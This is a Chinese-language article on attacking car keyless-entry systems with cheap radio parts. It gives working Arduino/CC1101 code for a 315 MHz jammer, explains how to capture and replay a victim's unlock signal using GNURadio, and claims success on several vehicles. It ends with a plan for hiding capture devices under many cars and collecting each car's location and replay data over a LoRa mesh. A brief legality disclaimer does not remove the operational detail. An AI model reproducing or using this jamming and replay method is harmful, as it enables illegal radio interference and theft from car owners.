在最近几年,入侵汽车在当代社会的黑客圈中成为热点,很多文章表明汽车产业还有很多东西等待完善,在本篇文章中,我会让你熟悉我一直研究的一些概念,以及如何在网状网络中使用一些便宜的部件渗透远程开门系统。
软件无线电
Software-defined radio(SDR)即软件无线电,它是一种实现无线通信的新概念和体制。其中已在硬件上被实现的组件(例如混频器,滤波器,放大器,调制器/解调器,检测器等)可以通过软件手段在个人计算机上或嵌入式系统中被代替,即很多功能是在软件平台上实现的。虽然SDR不是一个新概念,但是随着数字电子学的飞速发展,很多东西从理论可行转变为实际可行。
然而大多数SDR设备都非常昂贵,特别是HackRF,BladeRF等等,如果你在寻找最便宜的方案,那么RTL2382U是个不错的选择,它们在Ebay上只需大约15美元。
这是我的RTL2382U以及一个天线。
这是另一个,我没有停止用它,因为我在用它后面的GPS模块。
使用这个设备和Linux机器连接起来,然后用HDSDR查看按键时的实时情况。
如你所见,宝马汽车制造商使用频段315Mhz,屏幕上的红线是我按下按钮时出现的。
当受害者走向他们的汽车并且按下解锁键时,信号就会被发送到汽车,然后门就会被解锁,所以我们需要在这一切发生之前拦截所有交互。
如何制作一个干扰器
在这部分,我在ebay上购买了一些CC1101无线射频收发器,我们将通过这些,使用ardunio nano板来实施拦截和重放。
如上图,我们有两个CC1101收发器连接在ardunio nano上,任何手机都可以为nano供电,根据其收发强度,其有效范围可达10米。
这个没有太多技术含量,我修改了panstamp库来使其在315Mhz上工作,因为原本的库在433Mhz,868Mhz和915Mhz上工作,而这些频段我们都不需要。接下来我们需要找出315频段的频谱中的highbyte,middlebyte和lowbyte。
低,中,高是三个寄存器,其值可以改变工作频率。我使用的是12:29:137。
必须注意的是,在美国境内使用干扰器是非法的,这篇文章中的任何成功攻击的信息都被移除,它只提供了使用的基础且没有深入,感谢理解!
#include "EEPROM.h"#include "cc1101.h"CC1101 cc1101;// The LED is wired to the Arduino Output 4 (physical panStamp pin 19)#define LEDOUTPUT 7// counter to get increment in each loopbyte counter;byte b;byte syncWord = 199;void blinker(){//digitalWrite(LEDOUTPUT, HIGH);//delay(100);//digitalWrite(LEDOUTPUT, LOW);///delay(100);}void setup(){//Serial.begin(38400);Serial.begin(9200);Serial.println("start");// reset the countercounter=0;Serial.println("initializing...");// initialize the RF Chipcc1101.init();cc1101.setSyncWord(&syncWord, false);cc1101.setCarrierFreq(CFREQ_315);cc1101.disableAddressCheck();//cc1101.setTxPowerAmp(PA_LowPower);//Serial.print("CC1101_PARTNUM "); //cc1101=0Serial.println(cc1101.readReg(CC1101_PARTNUM, CC1101_STATUS_REGISTER));//Serial.print("CC1101_VERSION "); //cc1101=4Serial.println(cc1101.readReg(CC1101_VERSION, CC1101_STATUS_REGISTER));//Serial.print("CC1101_MARCSTATE ");Serial.println(cc1101.readReg(CC1101_MARCSTATE, CC1101_STATUS_REGISTER) & 0x1f);}void send_data() {CCPACKET data;data.length=1000;data.data[0]=10;data.data[2]=1;data.data[3]=1;data.data[4]=0;//cc1101.flushTxFifo ();Serial.print(cc1101.readReg(CC1101_MARCSTATE, CC1101_STATUS_REGISTER));if(cc1101.sendData(data)){send_data();}}void loop(){send_data();}上面的代码是我在使用CC1101时发现的,对我们来说效果不是特别好。
我首先要直接发送一个脉冲信号来阻止所有其他信号。在数据数组中填充1似乎是不错的主意。
#include "EEPROM.h"#include "cc1101.h"CC1101 cc1101;CCPACKET data;void setup(){ // initialize the RF Chip cc1101.init(); // For 315 MHz -> 0C1D8A // 0C1D8A gives 315000061.03515625 Hz cc1101.writeReg(CC1101_FREQ2, 0x0C); // Set Transmitter cc1101.writeReg(CC1101_FREQ1, 0X1D); // freq to cc1101.writeReg(CC1101_FREQ0, 0x8A); // 315 MHz data.length = 100; for(int a = 0; a < 100; a++) { data.data[a]= 1; // Filling the data array } }void loop(){ cc1101.sendData(data);}
当受害者按下解锁按钮时,信号首先被拦截,然后干扰信号(我们称之为signalX)被捕获并保存,随后我们将使用GNURadio来从原始的钥匙信号信号(我们称之为signalY)中分离出我们创建的实际干扰信号。当受害者再次按下解锁按钮时,我们原来保存的signalX就被发送给汽车,signalY在稍后可以重放来解锁同一辆车。当信号被捕获时,你需要进行逆向才能发回。我使用GNURadio接收并解调原来的ASK信号,将其变成二进制调制波形,之后我可以用来重放。
振幅偏移调变(ASK)是振幅调制的一种形式,表示数字数据作为载波振幅的变化。在ASK系统中,通过在T秒的持续时间内传送固定幅度载波和固定频率来表示二进制1。如果信号值1不发送,则为0。
这个系统有用吗?
有用,我在两辆车和一辆卡车上测试了这个,都成功的打开了车门。可怕的是,任何人都可以花费不多的美元来实现这个系统;更可怕的是,SDR设备的价格正在稳步下滑,在这种情况下获取一个定制的设备会变得更加容易。
进阶
经过批量攻击概念的证明,我写了一些东西,证明了这种攻击不仅可以一次攻击一辆车,还可以一次攻击数百辆的汽车。下面是一些关键点。
购买捕获设备(我们称之为veh1),通过磁铁吸附在汽车下面,
当对方的密钥信号被捕获和解调时,我们想通过网状网络发送这个信号。
Wifi或者蓝牙的距离不足以传输信号,我会使用的LoRa(长距离低功耗无线通讯技术),其有效范围可达15英里。
veh1连接到其中心设备,并将其二进制调制波形发送出去。
如果能搭建一个类似发送包的网络就更好了,给每一个设备一个名字,这样一来你就知道那个设备对应的是哪辆车了。
收集数据:车辆名称,颜色,位置和重放攻击数据。
将其放置在任何车辆上,中央设备可以在几分钟内完成。